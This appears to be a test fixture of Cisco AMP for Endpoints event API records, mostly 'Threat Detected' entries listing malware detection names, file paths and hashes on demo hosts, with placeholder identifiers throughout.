Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257843180601000,"timestamp":1610705569,"timestamp_nanoseconds":536000000,"date":"2021-01-15T10:12:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257843180601413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":834324,"timestamp":1610705568,"timestamp_nanoseconds":82375000,"date":"2021-01-15T10:12:48+00:00","event_type":"Uninstall","event_type_id":553648166,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257791640994000,"timestamp":1610705557,"timestamp_nanoseconds":898000000,"date":"2021-01-15T10:12:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257791640993860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257740101386000,"timestamp":1610705545,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:12:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257740101386307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257688561779000,"timestamp":1610705533,"timestamp_nanoseconds":874000000,"date":"2021-01-15T10:12:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257688561778754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257641317138000,"timestamp":1610705522,"timestamp_nanoseconds":236000000,"date":"2021-01-15T10:12:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257641317138497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":641000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667317698527247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257589777531000,"timestamp":1610705510,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:11:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257589777530944","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257564007727000,"timestamp":1610705504,"timestamp_nanoseconds":218000000,"date":"2021-01-15T10:11:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257564007727167","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} 